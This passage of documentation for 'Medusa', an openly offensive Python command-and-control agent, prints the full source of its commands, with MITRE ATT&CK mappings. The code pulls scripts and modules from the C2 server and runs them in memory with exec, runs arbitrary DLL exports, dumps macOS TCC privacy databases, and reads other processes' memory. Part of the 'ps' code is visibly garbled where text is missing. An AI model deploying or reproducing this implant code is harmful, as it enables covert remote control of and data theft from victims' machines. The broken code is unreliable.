_remote_pointer_cache: return _remote_pointer_cache[dtype] name = 'RP_%s' % dtype.__name__ ptype = type(name, (RemotePointer,), {'_type_': dtype}) _remote_pointer_cache[dtype] = ptype return ptype RPWSTR = RPOINTER(ctypes.wintypes.WCHAR) class UNICODE_STRING(ctypes.Structure): _fields_ = (('Length', ctypes.wintypes.USHORT), ('MaximumLength', ctypes.wintypes.USHORT), ('Buffer', RPWSTR)) class LIST_ENTRY(ctypes.Structure): pass RPLIST_ENTRY = RPOINTER(LIST_ENTRY) LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY), ('Blink', RPLIST_ENTRY)) class LDR_DATA_TABLE_ENTRY(ctypes.Structure): _fields_ = (('Reserved1', PVOID * 2), ('InMemoryOrderLinks', LIST_ENTRY), ('Reserved2', PVOID * 2), ('DllBase', PVOID), ('EntryPoint', PVOID), ('Reserved3', PVOID), ('FullDllName', UNICODE_STRING), ('Reserved4', ctypes.wintypes.BYTE * 8), ('Reserved5', PVOID * 3), ('CheckSum', PVOID), ('TimeDateStamp', ctypes.wintypes.ULONG)) RPLDR_DATA_TABLE_ENTRY = RPOINTER(LDR_DATA_TABLE_ENTRY) class PEB_LDR_DATA(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 8), ('Reserved2', PVOID * 3), ('InMemoryOrderModuleList', LIST_ENTRY)) RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA) class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 16), ('Reserved2', PVOID * 10), ('ImagePathName', UNICODE_STRING), ('CommandLine', UNICODE_STRING)) RPRTL_USER_PROCESS_PARAMETERS = RPOINTER(RTL_USER_PROCESS_PARAMETERS) PPS_POST_PROCESS_INIT_ROUTINE = PVOID class PEB(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 2), ('BeingDebugged', ctypes.wintypes.BYTE), ('Reserved2', ctypes.wintypes.BYTE * 1), ('Reserved3', PVOID * 2), ('Ldr', RPPEB_LDR_DATA), ('ProcessParameters', RPRTL_USER_PROCESS_PARAMETERS), ('Reserved4', ctypes.wintypes.BYTE * 104), ('Reserved5', PVOID * 52), ('PostProcessInitRoutine', PPS_POST_PROCESS_INIT_ROUTINE), ('Reserved6', ctypes.wintypes.BYTE * 128), ('Reserved7', PVOID * 1), ('SessionId', ctypes.wintypes.ULONG)) RPPEB = RPOINTER(PEB) class PROCESS_BASIC_INFORMATION(ctypes.Structure): _fields_ = (('Reserved1', PVOID), ('PebBaseAddress', RPPEB), ('Reserved2', PVOID * 2), ('UniqueProcessId', ULONG_PTR), ('InheritedFromUniqueProcessId', ULONG_PTR)) def NtError(status): import sys descr = 'NTSTATUS(%#08x) ' % (status % 2**32,) if status & 0xC0000000 == 0xC0000000: descr += '[Error]' elif status & 0x80000000 == 0x80000000: descr += '[Warning]' elif status & 0x40000000 == 0x40000000: descr += '[Information]' else: descr += '[Success]' if sys.version_info[:2] < (3, 3): return WindowsError(status, descr) return OSError(None, descr, None, status) ntdll = ctypes.WinDLL('ntdll.dll') NtQueryInformationProcess = ntdll.NtQueryInformationProcess NtQueryInformationProcess.restype = NTSTATUS NtQueryInformationProcess.argtypes = ( ctypes.wintypes.HANDLE, PROCESSINFOCLASS, PVOID, ctypes.wintypes.ULONG, PULONG) class ProcessInformation(object): _close_handle = False _closed = False _module_names = None def __init__(self, process_id=None, handle=None): if process_id is None and handle is None: handle = GetCurrentProcess() elif handle is None: handle = OpenProcess(PROCESS_VM_READ | PROCESS_QUERY_INFORMATION, False, process_id) self._close_handle = True self._handle = handle self._query_info() if process_id is not None and not self._ldr: return def __del__(self, CloseHandle=CloseHandle): if self._close_handle and not self._closed: try: CloseHandle(self._handle) except WindowsError as e: pass self._closed = True def _query_info(self): info = PROCESS_BASIC_INFORMATION() handle = self._handle status = NtQueryInformationProcess(handle, ProcessBasicInformation, ctypes.byref(info), ctypes.sizeof(info), None) if status < 0: raise NtError(status) self._peb = peb = info.PebBaseAddress[0, handle] self._ldr = peb.Ldr[0, handle] def _modules_iter(self): headaddr = (PVOID.from_buffer(self._peb.Ldr).value + PEB_LDR_DATA.InMemoryOrderModuleList.offset) offset = LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.offset pentry = self._ldr.InMemoryOrderModuleList.Flink while pentry: pentry_void = PVOID.from_buffer_copy(pentry) if pentry_void.value == headaddr: break pentry_void.value -= offset pmod = RPLDR_DATA_TABLE_ENTRY.from_buffer(pentry_void) mod = pmod[0, self._handle] yield mod pentry = LIST_ENTRY.from_buffer(mod, offset).Flink def update_module_names(self): names = [] for m in self._modules_iter(): ustr = m.FullDllName name = ustr.Buffer[0, self._handle, ustr.Length] names.append(name) self._module_names = names @property def module_names(self): if self._module_names is None: self.update_module_names() return self._module_names try: if not process_id: pi = ProcessInformation() else: pi = ProcessInformation(process_id) return { "dlls": pi.module_names } except Exception as e: return e ``` This output is turned into a sortable table via a browserscript. ================================================ FILE: documentation-payload/medusa/commands/list_modules.md ================================================ +++ title = "list_modules" chapter = false weight = 100 hidden = false +++ ## Summary Lists the modules (Python libraries) that have been loaded into the Medusa agent. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### module_name - Description: specific module to output a full file listing for - Required Value: False - Default Value: "" ## Usage ``` list_modules [module_name] ``` ## Detailed Summary This function will list the name of the modules that have been loaded into memory, and can provide a detailed file listing if a module name is passed to it: ```Python def list_modules(self, task_id, module_name=""): if module_name: if module_name in self.moduleRepo.keys(): return "\n".join(self.moduleRepo[module_name].namelist()) else: return "{} not found in loaded modules".format(module_name) else: return "\n".join(self.moduleRepo.keys()) ``` ================================================ FILE: documentation-payload/medusa/commands/list_tcc.md ================================================ +++ title = "list_tcc" chapter = false weight = 100 hidden = false +++ ## Summary This uses the Python `sqlite` library to query TCC databases and return the contents. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` list_tcc ``` ## Detailed Summary With the relevant access, Medusa uses the `sqlite` library to query the contents of either the Root or user-specific TCC databases. This is then formatted by a browser script in the UI. ```Python def list_tcc(self,task_id,tcc=True, db="/Library/Application Support/com.apple.TCC/TCC.db"): import sqlite3 with sqlite3.connect(db) as con: columns = [] for row in con.execute('PRAGMA table_info("access")'): columns.append(row) tcc = [] for row in con.execute('SELECT * FROM "access"'): tcc.append(row) results = [] for entry in tcc: line={} count = 0 for ent in entry: if columns[count][2] == "BLOB" and ent != None: line[columns[count][1]] = base64.b64encode(ent).decode() else: line[columns[count][1]] = str(ent) count+=1 results.append(line) tcc_results = {} tcc_results["entries"] = results return { "tcc": results } ``` ================================================ FILE: documentation-payload/medusa/commands/load.md ================================================ +++ title = "load" chapter = false weight = 100 hidden = false +++ ## Summary This loads new functions into memory via the C2 channel - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### cmd_to_load - Description: name of existing Medusa command to load (e.g. shell) - Required Value: True - Default Value: None ## Usage ``` load cmd ``` ## MITRE ATT&CK Mapping - T1030 - T1129 ## Detailed Summary The associated command's python files (selecting the correct Python version where necessary) is base64 encoded, and sent down to the agent to be loaded in. ```Python def load(self, task_id, file_id, command): total_chunks = 1 chunk_num = 0 cmd_code = "" while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file_id, "chunk_num": chunk_num }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] cmd_code += base64.b64decode(chunk["chunk_data"]).decode() if cmd_code: exec(cmd_code.replace("\n ","\n")[4:]) setattr(medusa, command, eval(command)) cmd_list = [{"action": "add", "cmd": command}] responses = [{ "task_id": task_id, "user_output": "Loaded command: {}".format(command), "commands": cmd_list, "completed": True }] message = { "action": "post_response", "responses": responses } response_data = self.postMessageAndRetrieveResponse(message) else: return "Failed to upload '{}' command".format(command) ``` Notably, this implementation implements chunking for this function to facilitate large functions being loaded. ================================================ FILE: documentation-payload/medusa/commands/load_dll.md ================================================ +++ title = "load_dll" chapter = false weight = 100 hidden = false +++ ## Summary Uses Python's `ctypes` library to load a DLL on disk and execute it with a given export function. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### path - Description: path to DLL on target file system - Required Value: True - Default Value: None #### export - Description: exported function to execute - Required Value: True - Default Value: None ## Usage ``` load_dll path/to/dll function_exported ``` ## Detailed Summary Uses the `ctypes` library to execute a DLL with its supported function. This expects a DLL that returns an int value and doesn't exit the process upon completion (because that'll kill the agent too!): ```Python def load_dll(self, task_id, dllpath, dllexport): from ctypes import WinDLL dll_file_path = dllpath if dllpath[0] == os.sep \ else os.path.join(self.current_directory,dllpath) loaded_dll = WinDLL(dll_file_path) eval("{}.{}()".format("loaded_dll",dllexport)) return "[*] {} Loaded.".format(dllpath) ``` ================================================ FILE: documentation-payload/medusa/commands/load_module.md ================================================ +++ title = "load_module" chapter = false weight = 100 hidden = false +++ ## Summary Loads a zipped Python module into memory for reference in custom scripts. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### file - Description: a local zip file containing the directory for a python module - Required Value: True - Default Value: None #### module_name - Description: the name of the module being loaded, e.g. 'dns' - Required Value: True - Default Value: None ## Usage ``` load_module ``` ## Detailed Summary This function instantiates a new custom finder and adds it to `meta_path`. When an import is used in subsequent scripts, the `meta_path` will use this custom finder to load the module directly from memory, rather than from on-disk standard locations: Python 2.7 ```Python def load_module(self, task_id, file, module_name): import zipfile, io class CFinder(object): def __init__(self, repoName, instance): self.moduleRepo = instance.moduleRepo self.repoName = repoName self._source_cache = {} def _get_info(self, repoName, fullname): parts = fullname.split('.') submodule = parts[-1] modulepath = '/'.join(parts) _search_order = [('.py', False), ('/__init__.py', True)] for suffix, is_package in _search_order: relpath = modulepath + suffix try: self.moduleRepo[repoName].getinfo(relpath) except KeyError: pass else: return submodule, is_package, relpath msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName)) raise ImportError(msg) def _get_source(self, repoName, fullname): submodule, is_package, relpath = self._get_info(repoName, fullname) fullpath = '%s/%s' % (repoName, relpath) if relpath in self._source_cache: source = self._source_cache[relpath] return submodule, is_package, fullpath, source try: source = self.moduleRepo[repoName].read(relpath) source = source.replace(b'\r\n', b'\n') source = source.replace(b'\r', b'\n') self._source_cache[relpath] = source return submodule, is_package, fullpath, source except: raise ImportError("Unable to obtain source for module %s" % (fullpath)) def find_module(self, fullname, path=None): try: submodule, is_package, relpath = self._get_info(self.repoName, fullname) except ImportError: return None else: return self def load_module(self, fullname): import imp submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) code = compile(source, fullpath, 'exec') mod = sys.modules.setdefault(fullname, imp.new_module(fullname)) mod.__loader__ = self mod.__file__ = fullpath mod.__name__ = fullname if is_package: mod.__path__ = [os.path.dirname(mod.__file__)] exec code in mod.__dict__ return mod def get_data(self, fullpath): prefix = os.path.join(self.repoName, '') if not fullpath.startswith(prefix): raise IOError('Path %r does not start with module name %r', (fullpath, prefix)) relpath = fullpath[len(prefix):] try: return self.moduleRepo[self.repoName].read(relpath) except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName)) def is_package(self, fullname): """Return if the module is a package""" submodule, is_package, relpath = self._get_info(self.repoName, fullname) return is_package def get_code(self, fullname): submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) return compile(source, fullpath, 'exec') if module_name in self.moduleRepo.keys(): return "{} module already loaded.".format(module_name) total_chunks = 1 chunk_num = 0 module_zip = bytearray() while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] total_chunks = chunk["total_chunks"] chunk_num+=1 module_zip.extend(base64.b64decode(chunk["chunk_data"])) if module_zip: self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip)) if module_name not in self._meta_cache: finder = CFinder(module_name, self) self._meta_cache[module_name] = finder sys.meta_path.append(finder) else: return "Failed to download in-memory module" ``` Python 3.8: ```Python def load_module(self, task_id, file, module_name): import zipfile, io class CFinder(object): def __init__(self, repoName, instance): self.moduleRepo = instance.moduleRepo self.repoName = repoName self._source_cache = {} def _get_info(self, repoName, fullname): parts = fullname.split('.') submodule = parts[-1] modulepath = '/'.join(parts) _search_order = [('.py', False), ('/__init__.py', True)] for suffix, is_package in _search_order: relpath = modulepath + suffix try: self.moduleRepo[repoName].getinfo(relpath) except KeyError: pass else: return submodule, is_package, relpath msg = ('Unable to locate module %s in the %s repo' % (submodule, repoName)) raise ImportError(msg) def _get_source(self, repoName, fullname): submodule, is_package, relpath = self._get_info(repoName, fullname) fullpath = '%s/%s' % (repoName, relpath) if relpath in self._source_cache: source = self._source_cache[relpath] return submodule, is_package, fullpath, source try: source = self.moduleRepo[repoName].read(relpath) source = source.replace(b'\r\n', b'\n') source = source.replace(b'\r', b'\n') self._source_cache[relpath] = source return submodule, is_package, fullpath, source except: raise ImportError("Unable to obtain source for module %s" % (fullpath)) def find_module(self, fullname, path=None): try: submodule, is_package, relpath = self._get_info(self.repoName, fullname) except ImportError: return None else: return self def load_module(self, fullname): import types submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) code = compile(source, fullpath, 'exec') mod = sys.modules.setdefault(fullname, types.ModuleType(fullname)) mod.__loader__ = self mod.__file__ = fullpath mod.__name__ = fullname if is_package: mod.__path__ = [os.path.dirname(mod.__file__)] exec(code, mod.__dict__) return mod def get_data(self, fullpath): prefix = os.path.join(self.repoName, '') if not fullpath.startswith(prefix): raise IOError('Path %r does not start with module name %r', (fullpath, prefix)) relpath = fullpath[len(prefix):] try: return self.moduleRepo[self.repoName].read(relpath) except KeyError: raise IOError('Path %r not found in repo %r' % (relpath, self.repoName)) def is_package(self, fullname): """Return if the module is a package""" submodule, is_package, relpath = self._get_info(self.repoName, fullname) return is_package def get_code(self, fullname): submodule, is_package, fullpath, source = self._get_source(self.repoName, fullname) return compile(source, fullpath, 'exec') if module_name in self.moduleRepo.keys(): return "{} module already loaded.".format(module_name) total_chunks = 1 chunk_num = 0 module_zip = bytearray() while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num+1 }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] total_chunks = chunk["total_chunks"] chunk_num+=1 module_zip.extend(base64.b64decode(chunk["chunk_data"])) if module_zip: self.moduleRepo[module_name] = zipfile.ZipFile(io.BytesIO(module_zip)) if module_name not in self._meta_cache: finder = CFinder(module_name, self) self._meta_cache[module_name] = finder sys.meta_path.append(finder) else: return "Failed to download in-memory module" ``` ================================================ FILE: documentation-payload/medusa/commands/load_script.md ================================================ +++ title = "load_script" chapter = false weight = 100 hidden = false +++ ## Summary This loads a new script into memory via the C2 channel. It can be used in combination with the `eval_code` function, and `setattr()` to dynamically add capability outside of Medusa's existing functions. - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### file - Description: script file to load into agent - Required Value: True - Default Value: None ## Usage ``` load_script ``` ## Detailed Summary The python script is downloaded and executed using the Python `exec()` function. Notably, this implementation implements chunking for this function to facilitate large scripts being loaded. Depending on the script content being interpreted, you can include functions that may be called later, using the `setattr()` function and Medusa's `eval_code` function. Firstly, the function itself: ```Python def load_script(self, task_id, file): total_chunks = 1 chunk_num = 0 cmd_code = "" while (chunk_num < total_chunks): if [task for task in self.taskings if task["task_id"] == task_id][0]["stopped"]: return "Job stopped." data = { "action": "post_response", "responses": [ { "upload": { "chunk_size": CHUNK_SIZE, "file_id": file, "chunk_num": chunk_num }, "task_id": task_id } ]} response = self.postMessageAndRetrieveResponse(data) chunk = response["responses"][0] chunk_num+=1 total_chunks = chunk["total_chunks"] cmd_code += base64.b64decode(chunk["chunk_data"]).decode() if cmd_code: exec(cmd_code) else: return "Failed to load script" ``` If we pass a script like the one below to Medusa, it'll print `hello` immediately. Then, as we've registered our `hello_again` function, we can call it again with the Medusa command: `eval_code self.hello_again()`. This will then execute the second print statement, to display `hello again`. A very simple example, but hopefully one that articulates what's possible here. ``` print("hello") def hello_again(self): print("hello again") setattr(medusa, "hello_again", hello_again) ``` {{% notice warning %}} Script content must be compatible with the version of Python the agent is running with! {{% /notice %}} ================================================ FILE: documentation-payload/medusa/commands/ls.md ================================================ +++ title = "ls" chapter = false weight = 100 hidden = false +++ ## Summary Get attributes about a file and display it to the user via API calls. No need for quotes and relative paths are fine - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### path - Description: Path of file or folder on the current system to list - Required Value: True - Default Value: . ## Usage ``` ls /path/to/file ``` ## MITRE ATT&CK Mapping - T1106 - T1083 ## Detailed Summary This command used python `os` library functions to get the contents of directories and metadata of files. Python 2.7: ```Python def ls(self, task_id, path, file_browser=False): if path == ".": file_path = self.current_directory else: file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) file_details = os.stat(file_path) target_is_file = os.path.isfile(file_path) target_name = os.path.basename(file_path.rstrip(os.sep)) file_browser = { "host": socket.gethostname(), "is_file": target_is_file, "permissions": {"octal": oct(file_details.st_mode)[-3:]}, "name": target_name if target_name != "." \ else os.path.basename(self.current_directory.rstrip(os.sep)), "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)), "success": True, "access_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)), "modify_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)), "size": file_details.st_size, "update_deleted": True, } files = [] if not target_is_file: for entry in os.listdir(file_path): full_path = os.path.join(file_path, entry) file = {} file['name'] = entry file['is_file'] = True if os.path.isfile(full_path) else False try: file_details = os.stat(full_path) file["permissions"] = { "octal": oct(file_details.st_mode)[-3:]} file["access_time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)) file["modify_time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)) file["size"] = file_details.st_size except OSError as e: pass files.append(file) file_browser["files"] = files task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["file_browser"] = file_browser return { "files": files } ``` Python 3.8 ```Python def ls(self, task_id, path, file_browser=False): if path == ".": file_path = self.current_directory else: file_path = path if path[0] == os.sep \ else os.path.join(self.current_directory,path) file_details = os.stat(file_path) target_is_file = os.path.isfile(file_path) target_name = os.path.basename(file_path.rstrip(os.sep)) file_browser = { "host": socket.gethostname(), "is_file": target_is_file, "permissions": {"octal": oct(file_details.st_mode)[-3:]}, "name": target_name if target_name != "." \ else os.path.basename(self.current_directory.rstrip(os.sep)), "parent_path": os.path.abspath(os.path.join(file_path, os.pardir)), "success": True, "access_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)), "modify_time": time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)), "size": file_details.st_size, "update_deleted": True, } files = [] if not target_is_file: with os.scandir(file_path) as entries: for entry in entries: file = {} file['name'] = entry.name file['is_file'] = True if entry.is_file() else False try: file_details = os.stat(os.path.join(file_path, entry.name)) file["permissions"] = { "octal": oct(file_details.st_mode)[-3:]} file["access_time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_atime)) file["modify_time"] = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(file_details.st_mtime)) file["size"] = file_details.st_size except OSError as e: pass files.append(file) file_browser["files"] = files task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["file_browser"] = file_browser return { "files": files } ``` This command helps populate the file browser, which is where all this data can be seen. ================================================ FILE: documentation-payload/medusa/commands/mv.md ================================================ +++ title = "mv" chapter = false weight = 100 hidden = false +++ ## Summary Move a given file or folder to a specified location. No quotes are necessary and relative paths are fine - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ### Arguments #### source_path - Description: path of file/folder to move - Required Value: True - Default Value: None #### dest_path - Description: path to move file/folder to - Required Value: True - Default Value: None ## Usage ### Without Popup Option ``` mv path/of/file_or_folder /dest/to/move/to ``` ## Detailed Summary You can either type `mv` and get a popup to fill in the paths, or provide the paths on the command line. ```Python def mv(self, task_id, source, destination): import shutil source_path = source if source[0] == os.sep \ else os.path.join(self.current_directory,source) dest_path = destination if destination[0] == os.sep \ else os.path.join(self.current_directory,destination) shutil.move(source_path, dest_path) ``` ================================================ FILE: documentation-payload/medusa/commands/pip_freeze.md ================================================ +++ title = "pip_freeze" chapter = false weight = 100 hidden = false +++ ## Summary Prints the currently installed python packages on the target system - Python Versions Supported: 2.7, 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` pip_freeze ``` ## Detailed Summary Attempts to list packages (ideally with version information) using a series of methods, based on availability: ```Python def pip_freeze(self, task_id): out="" try: import pkg_resources installed_packages = pkg_resources.working_set installed_packages_list = sorted(["%s==%s" % (i.key, i.version) for i in installed_packages]) return "\n".join(installed_packages_list) except: out+="[*] pkg_resources module not installed.\n" try: from pip._internal.operations.freeze import freeze installed_packages_list = freeze(local_only=True) return "\n".join(installed_packages_list) except: out+="[*] pip module not installed.\n" try: import pkgutil installed_packages_list = [ a for _, a, _ in pkgutil.iter_modules()] return "\n".join(installed_packages_list) except: out+="[*] pkgutil module not installed.\n" return out+"[!] No modules available to list installed packages." ``` ================================================ FILE: documentation-payload/medusa/commands/ps.md ================================================ +++ title = "ps" chapter = false weight = 100 hidden = false +++ ## Summary This uses the ctypes library to interface with Windows API to enumerate process IDs and return a limited (marginally better opsec) process list. - Python Versions Supported: 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` ps ``` ## MITRE ATT&CK Mapping - T1057 ## Detailed Summary This function will only return PID, process name, architecture and binary path. Further details can be pulled back with `ps_full`. ```Python def ps(self, task_id): import sys, os.path, ctypes, ctypes.wintypes, re from ctypes import create_unicode_buffer, GetLastError def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Psapi = ctypes.WinDLL('Psapi.dll') EnumProcesses = Psapi.EnumProcesses EnumProcesses.restype = ctypes.wintypes.BOOL GetProcessImageFileName = Psapi.GetProcessImageFileNameA GetProcessImageFileName.restype = ctypes.wintypes.DWORD Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool IsWow64Process = Kernel32.IsWow64Process PROCESS_QUERY_INFORMATION = 0x0400 WIN32_PROCESS_TIMES_TICKS_PER_SECOND = 1e7 MAX_PATH = 260 PROCESS_TERMINATE = 0x0001 PROCESS_QUERY_INFORMATION = 0x0400 TOKEN_QUERY = 0x0008 TOKEN_READ = 0x00020008 TOKEN_IMPERSONATE = 0x00000004 TOKEN_QUERY_SOURCE = 0x0010 TOKEN_DUPLICATE = 0x0002 TOKEN_ASSIGN_PRIMARY = 0x0001 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value def query_dos_device(drive_letter): chars = 1024 drive_letter = drive_letter p = create_unicode_buffer(chars) if 0 == Kernel32.QueryDosDeviceW(drive_letter, p, chars): pass return p.value def create_drive_mapping(): mappings = {} for letter in (chr(l) for l in range(ord('C'), ord('Z')+1)): try: letter = u'%s:' % letter mapped = query_dos_device(letter) mappings[mapped] = letter except WindowsError: pass return mappings mappings = create_drive_mapping() def normalise_binpath(path): match = re.match(r'(^\\Device\\[a-zA-Z0-9]+)(\\.*)?$', path) if not match: return f"Cannot convert {path} into a Win32 compatible path" if not match.group(1) in mappings: return None drive = mappings[match.group(1)] if not drive or not match.group(2): return drive return drive + match.group(2) processes = [] count = 32 while True: ProcessIds = (ctypes.wintypes.DWORD*count)() cb = ctypes.sizeof(ProcessIds) BytesReturned = ctypes.wintypes.DWORD() if EnumProcesses(ctypes.byref(ProcessIds), cb, ctypes.byref(BytesReturned)): if BytesReturned.value0: filename = os.path.basename(ImageFileName.value) process["name"] = filename.decode() process["bin_path"] = normalise_binpath(ImageFileName.value.decode()) CloseHandle(hProcess) processes.append(process) task = [task for task in self.taskings if task["task_id"] == task_id] task[0]["processes"] = processes return { "processes": processes } ``` This output is turned into a sortable table via a browserscript. ================================================ FILE: documentation-payload/medusa/commands/ps_full.md ================================================ +++ title = "ps_full" chapter = false weight = 100 hidden = false +++ ## Summary This uses the ctypes library to interface with Windows API to enumerate process IDs and return a full process list. - Python Versions Supported: 3.8 - Needs Admin: False - Version: 1 - Author: @ajpc500 ## Usage ``` ps_full ``` ## MITRE ATT&CK Mapping - T1057 ## Detailed Summary In addition to what is returned with `ps`, this function returns the PPID, integrity level and command line parameters. ```Python def ps_full(self, task_id): import sys, os.path, ctypes, ctypes.wintypes from ctypes import create_unicode_buffer, GetLastError def _check_bool(result, func, args): if not result: raise ctypes.WinError(ctypes.get_last_error()) return args PULONG = ctypes.POINTER(ctypes.wintypes.ULONG) ULONG_PTR = ctypes.wintypes.LPVOID SIZE_T = ctypes.c_size_t NTSTATUS = ctypes.wintypes.LONG PVOID = ctypes.wintypes.LPVOID PROCESSINFOCLASS = ctypes.wintypes.ULONG Psapi = ctypes.WinDLL('Psapi.dll') EnumProcesses = Psapi.EnumProcesses EnumProcesses.restype = ctypes.wintypes.BOOL Kernel32 = ctypes.WinDLL('kernel32.dll') OpenProcess = Kernel32.OpenProcess OpenProcess.restype = ctypes.wintypes.HANDLE CloseHandle = Kernel32.CloseHandle CloseHandle.errcheck = _check_bool IsWow64Process = Kernel32.IsWow64Process GetCurrentProcess = Kernel32.GetCurrentProcess GetCurrentProcess.restype = ctypes.wintypes.HANDLE GetCurrentProcess.argtypes = () ReadProcessMemory = Kernel32.ReadProcessMemory ReadProcessMemory.errcheck = _check_bool ReadProcessMemory.argtypes = ( ctypes.wintypes.HANDLE, ctypes.wintypes.LPCVOID, ctypes.wintypes.LPVOID, SIZE_T, ctypes.POINTER(SIZE_T)) PROCESS_VM_READ = 0x0010 PROCESS_QUERY_INFORMATION = 0x0400 MAX_PATH = 260 PROCESS_QUERY_INFORMATION = 0x0400 ProcessBasicInformation = 0 ProcessDebugPort = 7 ProcessWow64Information = 26 ProcessImageFileName = 27 ProcessBreakOnTermination = 29 STATUS_UNSUCCESSFUL = NTSTATUS(0xC0000001) STATUS_INFO_LENGTH_MISMATCH = NTSTATUS(0xC0000004).value STATUS_INVALID_HANDLE = NTSTATUS(0xC0000008).value STATUS_OBJECT_TYPE_MISMATCH = NTSTATUS(0xC0000024).value class RemotePointer(ctypes._Pointer): def __getitem__(self, key): size = None if not isinstance(key, tuple): raise KeyError('must be (index, handle[, size])') if len(key) > 2: index, handle, size = key else: index, handle = key if isinstance(index, slice): raise TypeError('slicing is not supported') dtype = self._type_ offset = ctypes.sizeof(dtype) * index address = PVOID.from_buffer(self).value + offset simple = issubclass(dtype, ctypes._SimpleCData) if simple and size is not None: if dtype._type_ == ctypes.wintypes.WCHAR._type_: buf = (ctypes.wintypes.WCHAR * (size // 2))() else: buf = (ctypes.c_char * size)() else: buf = dtype() nread = SIZE_T() Kernel32.ReadProcessMemory(handle, address, ctypes.byref(buf), \ ctypes.sizeof(buf), ctypes.byref(nread)) if simple: return buf.value return buf _remote_pointer_cache = {} def RPOINTER(dtype): if dtype in _remote_pointer_cache: return _remote_pointer_cache[dtype] name = 'RP_%s' % dtype.__name__ ptype = type(name, (RemotePointer,), {'_type_': dtype}) _remote_pointer_cache[dtype] = ptype return ptype RPWSTR = RPOINTER(ctypes.wintypes.WCHAR) class UNICODE_STRING(ctypes.Structure): _fields_ = (('Length', ctypes.wintypes.USHORT), ('MaximumLength', ctypes.wintypes.USHORT), ('Buffer', RPWSTR)) class LIST_ENTRY(ctypes.Structure): pass RPLIST_ENTRY = RPOINTER(LIST_ENTRY) LIST_ENTRY._fields_ = (('Flink', RPLIST_ENTRY), ('Blink', RPLIST_ENTRY)) class PEB_LDR_DATA(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 8), ('Reserved2', PVOID * 3), ('InMemoryOrderModuleList', LIST_ENTRY)) RPPEB_LDR_DATA = RPOINTER(PEB_LDR_DATA) class RTL_USER_PROCESS_PARAMETERS(ctypes.Structure): _fields_ = (('Reserved1', ctypes.wintypes.BYTE * 16), ('Reserved2', PVOID * 10), ('ImagePathName', UNICODE_STRING), ('CommandLine', UNICODE_STRING)) 